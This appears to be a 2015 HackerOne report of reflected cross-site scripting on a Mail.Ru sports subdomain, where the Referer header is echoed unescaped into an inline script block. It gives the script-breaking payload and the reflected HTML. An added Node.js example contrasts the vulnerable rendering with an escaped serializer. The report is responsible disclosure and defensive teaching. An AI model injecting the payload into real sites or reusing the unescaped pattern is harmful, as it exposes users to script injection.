Mail.Ru: XSS in touch.sports.mail.ru

2015-03-12T15:16:37
ID H1:51140
Type hackerone
Reporter ddworken
Modified 2015-05-21T01:20:31

Description

The XSS vulnerability is located here:

https://touch.sports.mail.ru

and is triggered by setting the Referer header to:

ttttt</script><script>alert(0)</script><script>

The problem is that the Referer value is reflected, without escaping, into a JSON object inside a `<script>` block, like so:

<script> [Other Javascript Here] "httpReferer":"ttttt </script> <script> alert(0) </script> <script> ","user":"","topBanner":{"sz":9,"slot":3333},"retinaBanner":" <div class=\"ad\">\r\n<img src=\"https:\/\/rs.mail.ru\/a12327061.gif?sz=9\&rnd=931100856\&ts=1426172695\&sz=9\" style=\"width:0;height:0;position:absolute;\" alt=\"\"\/>\n<!--zg-->\r\n<\/div>"} </script>

where the relevant part is (the HTML parser ends the script element at the first `</script` it sees, regardless of JavaScript string quoting, so the injected tags are parsed as a new script element):

<script> alert(0) </script>
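The following Node.js snippet is an added illustration, not code from the report or from Mail.Ru. It reproduces the vulnerable pattern (server state serialized straight into a `<script>` block, with the Referer value from the report as input) beside a hardened serializer that escapes `<`, `>`, `&` and the JSON-only line terminators as `\uXXXX` sequences, so the value can never terminate the script element. The function names, the `state` object, and the `scriptCloseCount` check are assumptions made for the example.

```javascript
// Added example (not from the report): why an unescaped Referer inside a
// <script> block is exploitable, and how to serialize server-side state so that
// it cannot break out of the script element.

// Referer value quoted in the report. Everything else in `state` is constructed.
const REFERER_FROM_REPORT = 'ttttt</script><script>alert(0)</script><script>';

// Vulnerable pattern: JSON.stringify alone is not enough in an HTML script
// context. The HTML parser closes the script element at the first "</script"
// before any JavaScript runs, so string quoting offers no protection.
function renderVulnerable(referer) {
  const state = { httpReferer: referer, user: '' };
  return '<script>var state = ' + JSON.stringify(state) + ';</script>';
}

// Hardened serializer: JSON.stringify, then replace the characters that matter
// to the HTML parser (and U+2028/U+2029, which JSON allows but JavaScript string
// literals historically did not) with \u escapes. The output is still valid JSON
// and valid JavaScript; JSON.parse recovers the original value exactly.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(referer) {
  const state = { httpReferer: referer, user: '' };
  return '<script>var state = ' + jsonForScript(state) + ';</script>';
}

// Check used below: how many script terminators would the HTML parser see?
// A correctly rendered block has exactly one (the real closing tag).
function scriptCloseCount(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Self-check when run directly: `node example.js`
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable terminators:', scriptCloseCount(renderVulnerable(REFERER_FROM_REPORT)));
  console.log('hardened terminators:  ', scriptCloseCount(renderHardened(REFERER_FROM_REPORT)));
  console.log(renderHardened(REFERER_FROM_REPORT));
}
```

The vulnerable rendering yields three script terminators (two from the injected value plus the real one), the hardened rendering yields one, and `JSON.parse` on the escaped JSON returns the original Referer string unchanged, so the fix costs nothing on the client side. The same escaping applies to any server state embedded in inline scripts, not only the Referer.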

I am aware that this is out of scope, but I am still reporting it since I just happened to spot it while looking for other bugs.